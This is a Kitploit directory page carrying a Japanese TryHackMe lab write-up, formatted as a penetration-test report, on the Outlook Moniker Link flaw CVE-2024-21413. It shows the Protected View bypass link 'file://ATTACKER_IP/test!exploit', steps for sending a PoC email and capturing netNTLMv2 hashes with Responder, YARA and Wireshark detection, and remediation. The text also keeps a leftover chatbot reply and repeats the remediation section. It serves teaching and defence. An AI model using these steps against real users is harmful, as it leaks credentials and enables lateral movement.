Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — 2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。この脆弱性はCVE-2024-21413として識別され、Moniker Link Vulnerabilityとして知られています。この脆弱性により、攻撃者はOutlookのProtected Viewメカニズムを回避することができます。 | Kitploit
ツール/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
脆弱性分析エクスプロイトペネトレーションテスト学習と教育メールセキュリティラボと実践
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。この脆弱性はCVE-2024-21413として識別され、Moniker Link Vulnerabilityとして知られています。この脆弱性により、攻撃者はOutlookのProtected Viewメカニズムを回避することができます。

リポジトリを見る
88ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。その識別子はCVE-2024-21413で、Moniker Link脆弱性として知られています。この脆弱性により、攻撃者はOutlookのProtected Viewメカニズムをバイパスできます。 image

素晴らしい 👍 以下が完全な翻訳 + Penetration Testing (PT) レポート形式の表現です。プロフェッショナルで明確な日本語で記述しています。 ご依頼の通り – 翻訳と表現のみです。 回答、スクリーンショット、補完はご自身で追加してください。必要に応じて、後ほどお手伝いします。


Penetration Testing レポート

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 エグゼクティブサマリー (Executive Summary)

2024年2月13日、MicrosoftはMicrosoft Outlookの深刻なセキュリティ脆弱性を公開しました。その識別子は CVE-2024-21413で、Moniker Link脆弱性として知られています。

この脆弱性により、攻撃者は特別なリンク(Moniker Link)を使用してOutlookのProtected Viewメカニズムをバイパスし、被害者のOutlookクライアントに認証情報(NTLMハッシュ) を攻撃者が制御するサーバーに送信させることができます。ファイルの実行や効果的なセキュリティ警告は必要ありません。

この脆弱性は認証情報の漏洩につながる可能性があり、理論的にはリモートコード実行(RCE) の可能性もあります。


📌 脆弱性の詳細

パラメータ値
脆弱性IDCVE-2024-21413
公開日2024年2月13日
発見者Haifei Li – Check Point Research
影響認証情報漏洩 + 潜在的なRCE
深刻度Critical
攻撃の複雑さ低
CVSSスコア9.8
公式リンクhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 影響を受けるバージョン

この脆弱性は以下のバージョンに影響します:

  • Microsoft Office LTSC 2021 – バージョン19.0.0以降
  • Microsoft 365 Apps for Enterprise – バージョン16.0.1以降
  • Microsoft Office 2019 – バージョン16.0.1以降
  • Microsoft Office 2016 – バージョン16.0.5435.1001より前

🎓 学習目的 (Learning Objectives)

  • 脆弱性の動作原理の理解
  • Outlook Protected Viewメカニズムの理解
  • 脆弱性を悪用した認証情報漏洩
  • 検出(Detection)手段
  • 緩和策(Mitigation)の推奨

(脆弱性の説明)

image

Microsoft OutlookはHTML形式のメール表示や、http://、https://などのさまざまなリンク解析をサポートしています。さらに、OutlookはMoniker Linksと呼ばれる特別なリンクもサポートしており、これによりアプリケーションの起動やOS上の外部リソースへのアクセスが可能になります。

通常の状態では、外部アプリケーションを起動したりシステムリソースにアクセスするリンク(file://リンクなど)がメールに含まれている場合、OutlookのProtected Viewセキュリティメカニズムが作動します。このメカニズムはセキュリティ警告を表示し、コード実行、マクロ、外部ネットワークリソースへのアクセスなどの危険な操作をブロックします。

しかし、Outlook(CVE-2024-21413)に脆弱性が見つかり、Moniker Linkタイプのリンクを簡単に操作することでProtected Viewメカニズムをバイパスできることが判明しました。

発見内容 (Findings)

テストの結果、次のような通常のリンク:

root@kitploit:~
file://ATTACKER_IP/test

を使用すると、OutlookはSMBプロトコルを使用してネットワークリソースにアクセスしようと試みますが、この試みはProtected Viewによってブロックされます。

一方、リンクに特殊文字!と追加のテキスト文字列が含まれている場合、例:

root@kitploit:~
file://ATTACKER_IP/test!exploit

OutlookはProtected Viewを起動せず、リモートサーバーへの認証試行を行います。

この試行中に:

  • OutlookはSMB経由でリソースにアクセスしようとする
  • 自動認証リクエストが行われる
  • ユーザーの認証情報が攻撃者に送信される
  • 被害者のWindows netNTLMv2ハッシュがキャプチャされる

重要な点は、リモート共有が実際に存在する必要はなく、認証試行はどのみち行われることです。

影響 (Impact)

この脆弱性により、攻撃者は以下を可能にします:

  • ユーザー認証情報(netNTLMv2ハッシュ)の漏洩
  • オフライン攻撃(クラッキング/Pass-the-Hash)
  • 組織ネットワーク内での横方向の移動

さらに、Moniker LinksはWindowsのCOM(Component Object Model)メカニズムを使用するため、理論的にはリモートコード実行(RCE)が可能です。ただし、テスト時点では、この脆弱性を利用した実際のRCEを実現する公開されたProof of Conceptは存在しません。

脆弱性の悪用 (Exploitation)

攻撃では、被害者に前のタスクで示したようなMoniker Linkを含むメールが送信されます。 攻撃者の目的は、OutlookのProtected ViewメカニズムをバイパスするMoniker Linkを含むメールを作成し、被害者がリンクをクリックするとすぐに、被害者のOutlookクライアントが攻撃者のマシンからファイルを読み込もうとするようにすることです。この操作により、被害者のnetNTLMv2ハッシュが送信され、攻撃者にキャプチャされます。

攻撃を実行する前に、デモ用に作成された(GitHubでも入手可能な)Proof of Concept(PoC)を確認します。

作成者:CMNatic | https://github.com/cmnatic バージョン:1.0 | 19/02/2024

このコードはPython言語を使用し、悪意のあるMoniker Linkを含むHTMLメールを送信します。

PoCの説明

PoCは:

  • 攻撃者のメールアドレスと被害者のメールアドレスを受け取る
  • SMTP認証のためのパスワードを要求する (このルームでは、[email protected]のパスワードは:attacker)
  • 悪意のあるMoniker Linkを含むメールのHTMLコンテンツ(html_content)を含む
  • メールのSubject、From、Toフィールドを設定する
  • メールサーバーを介してメールを送信する

実際のシナリオでは、攻撃者が制御するSMTPサーバーが必要です(このルームではサーバーはすでに提供されています)。

ハッシュキャプチャ用リスナー – Responder

メール送信後、攻撃者のマシンでResponderというリスナーツールを起動し、SMBリクエストをキャプチャします。

THM AttackBoxでは、インターフェース名はens5です:

root@kitploit:~
responder -I ens5

ResponderはSMB、LLMNR、NBT-NSリクエストをリッスンし、認証情報のキャプチャを可能にします。

被害者マシンの起動

スプリットスクリーンウィンドウから被害者マシンを起動します

Outlookを起動します

「サインインしない、またはアカウントを作成しない」オプションを選択します

プロダクトキー入力ウィンドウを閉じます

被害者のメールボックスはあらかじめ設定されています

エクスプロイトの実行

AttackBoxで:

exploit.pyという新しいファイルを作成します

PoCコードを貼り付けます

実行前に調整が必要です:

Moniker Link内の攻撃者マシンのIPアドレスを更新します(12行目)

MAILSERVERの値を次のアドレスに置き換えます:

root@kitploit:~
10.64.165.67

その後、実行します:

root@kitploit:~
python3 exploit.py

パスワードの入力を求められたら、次のように入力します:

root@kitploit:~
attacker

操作が成功すると、次のメッセージが表示されます:

root@kitploit:~
Email delivered

結果

被害者マシンでメールを開き、「Click me」リンクをクリックした後:

  • OutlookがSMB経由で攻撃者のマシンに接続しようとする
  • Responderが認証試行をキャプチャする
  • ユーザーのnetNTLMv2ハッシュが正常にキャプチャされる

攻撃は正常に完了しました。

image

検出 (Detection)

YARA

Florian Rothによって、Moniker Link内にfile:\\要素を含むメールを検出するためのYARAルールが作成されました。これはCVE-2024-21413の悪用試行を示す可能性があります。

YARAルールの例(ルームに表示):

ルールはメールの一般的な特性(Subject:、Received:など)を検索します

さらに、UNCパス(\)にファイル拡張子と末尾の!文字(Protected Viewバイパスの特性)を含むfile://リンクの疑わしいパターンを検索します

(コード自体は原文のまま)

Wireshark

さらに、Wiresharkのパケットキャプチャで、被害者マシンから攻撃者マシンへのSMBリクエストを確認できます。

リクエスト中:

  • SMB認証試行が行われる
  • netNTLMv2ハッシュ(場合によっては短縮/トランケートされた形式)を識別できる

緩和策 (Remediation)

Microsoftは、2月のPatch Tuesdayアップデートの一環として、この脆弱性を修正するセキュリティアップデートを含めました。 関連するKB記事のリストは、OfficeバージョンごとにMicrosoftの公式リンクで確認できます。

Microsoft Officeを以下の方法でアップデートすることを強く推奨します:

  • Windows Update
  • Microsoft Update Catalog

さらに、すべてのシステムにアップデートが適用されるまでは、基本的な情報セキュリティポリシーの実施、特にユーザーの意識向上が重要です。例えば:

  • 予期しないメール、特にランダムなリンクをクリックしない
  • クリックする前にリンクのプレビューを表示する
  • 不審なメールを組織の情報セキュリティ担当者に報告する

この脆弱性はOutlookのProtected Viewメカニズムをバイパスするため、Outlookの設定のみでこの攻撃をブロックすることはできません。

また、ほとんどの組織ではSMBプロトコルを完全にブロックすることは推奨されません。このプロトコルはネットワークリソースやファイル共有へのアクセスに不可欠だからです。ただし、組織のポリシーやネットワーク構造に応じて、ファイアウォールレベルでのブロックや制限を実装できる場合があります。

緩和策 (Remediation)

Microsoftは、2月のPatch Tuesdayアップデートの一環として、この脆弱性に対するセキュリティ修正を含めました。 関連するKB記事のリストは、Officeバージョンに応じてMicrosoftの公式リンクで確認できます。 Microsoft Officeを以下の方法でアップデートすることを強く推奨します:

  • Windows Update
  • Microsoft Update Catalog

さらに、すべてのシステムにアップデートが適用されるまでは、基本的な情報セキュリティポリシーの実施、特にユーザーの意識向上が重要です。例えば:

  • 予期しないメール、特にランダムなリンクをクリックしない
  • リンクのアドレスをクリック前に確認する(プレビュー)
  • 不審なメールを組織の情報セキュリティ担当者に報告する

この脆弱性はOutlookのProtected Viewメカニズムをバイパスするため、Outlook自体の設定変更によって攻撃を防ぐことはできません。

また、ほとんどの組織ではSMBプロトコルを完全にブロックすることは推奨されません。このプロトコルはファイル共有やネットワークリソースへのアクセスに不可欠だからです。ただし、組織のセキュリティポリシーとネットワーク構造に応じて、ファイアウォールレベルでの制限やブロックを実装できる場合があります。

ツールをダウンロード